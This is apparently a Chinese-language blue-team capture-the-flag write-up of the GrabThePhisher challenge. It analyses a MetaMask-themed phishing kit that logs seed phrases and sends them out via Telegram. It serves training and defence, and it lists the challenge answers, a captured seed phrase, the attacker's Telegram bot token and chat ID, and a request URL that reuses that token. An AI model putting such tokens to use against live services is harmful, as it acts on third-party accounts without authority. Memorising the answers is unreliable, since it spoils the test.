GrabThePhisher Blue Team Challenge

# GrabThePhisher Blue Team Challenge :::success https://cyberdefenders.org/blueteam-ctf-challenges/95#nav-questions ::: :::info Scenario: An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name "pankewk.zip". Provided the phishing kit, you as a soc analyst are requested to analyze it and do your threat intel homework. ::: 虛擬貨幣相關參考資料： https://medium.com/likecoin/%E5%A6%82%E4%BD%95%E6%94%B6%E8%97%8F%E5%A5%BD%E4%BD%A0%E7%9A%84%E5%8A%A0%E5%AF%86%E8%B2%A8%E5%B9%A3-daa35516cd4e #### 1. Which wallet is used for asking the seed phrase? ``` Metamask ``` 檢視目錄下有的資料，其中與加密貨幣相關的有metamask ![截圖 2023-12-05 下午3.52.14](https://hackmd.io/_uploads/r1h3UU2H6.jpg) 執行index.html後可以看到有多個加密貨幣錢包的圖示 ![截圖 2023-12-05 下午3.54.03](https://hackmd.io/_uploads/ByO7w8nHT.jpg) 檢視metamask目錄中的index.html，發現表面上是一個metamask加密貨幣錢包的畫面 ![截圖 2023-12-05 下午3.52.35](https://hackmd.io/_uploads/SJZ08I2Ha.jpg) 實際上他有跑javascript，目的是側錄鍵盤。 ![截圖 2023-12-05 下午4.04.11](https://hackmd.io/_uploads/Bk_FYUhrp.jpg) 檢視metamask.php，可以看到在前半段會先利用使用者的ip向sypexgeo取得使用者的geo資訊 ![截圖 2023-12-05 下午3.51.08](https://hackmd.io/_uploads/ByaOLU3Bp.jpg) 查詢api.sypexgeo.net，發現他是搜集使用者geo資本資訊的api，後半段則是將前面側錄到的資料利用telegram傳送出去。 ![截圖 2023-12-05 下午3.48.50](https://hackmd.io/_uploads/Bkeg8IhST.jpg) #### 2. What is the file name that has the code for the phishing kit? ``` metamask.php ``` 承上題，phishing kit是metamask.php檔案。 #### 3. In which language was the kit written? ``` php ``` 承上題，phishing kit是用php撰寫的。 #### 4. What service does the kit use to retrieve the victim's machine information? ``` sypex geo ``` 承第一題，程式利用 http://api.sypexgeo.net/json 搜集使用者geo資料。 #### 5. How many seed phrases were already collected? ``` 3 ``` 承第一題，蒐集到的資料會存在/log/log.txt中，發現有3筆資料。 ![截圖 2023-12-05 下午4.12.25](https://hackmd.io/_uploads/BkI_iIhH6.jpg) #### 6. Write down the seed phrase of the most recent phishing incident? ``` father also recycle embody balance concert mechanic believe owner pair muffin hockey ``` 承上題。 #### 7. Which medium had been used for credential dumping? ``` telegram ``` 承第一題，利用telegram將資料傳出。 #### 8. What is the token for the channel? ``` 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10 ``` 承第一題，token資訊寫在metamask.php中。 #### 9. What is the chat ID of the phisher's channel? ``` 5442785564 ``` 承第一題，chat id資訊寫在metamask.php中。 #### 10. What are the allies of the phish kit developer? ```` j1j1b1s@m3r0 ```` 承第一題。 #### 11. What is the full name of the Phish Actor? ```` Marcus Aurelius ```` 承第一題，可以知道攻擊者傳送資料使用的telegram api以及使用的token、client id參數。 ![截圖 2023-12-06 下午3.45.16](https://hackmd.io/_uploads/ByTqLjTST.jpg) 依相同格式重新寄送api請求一次 ``` https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/sendMessage?chat_id=5442785564&text="123456"&parse_mode=html ``` 得到以下response，其中包含使用者full name。 ![截圖 2023-12-05 下午5.03.41](https://hackmd.io/_uploads/Hk9OvwhHp.jpg) #### 12. What is the username of the Phish Actor? ``` pumpkinboii ``` 承上題，response中包含username。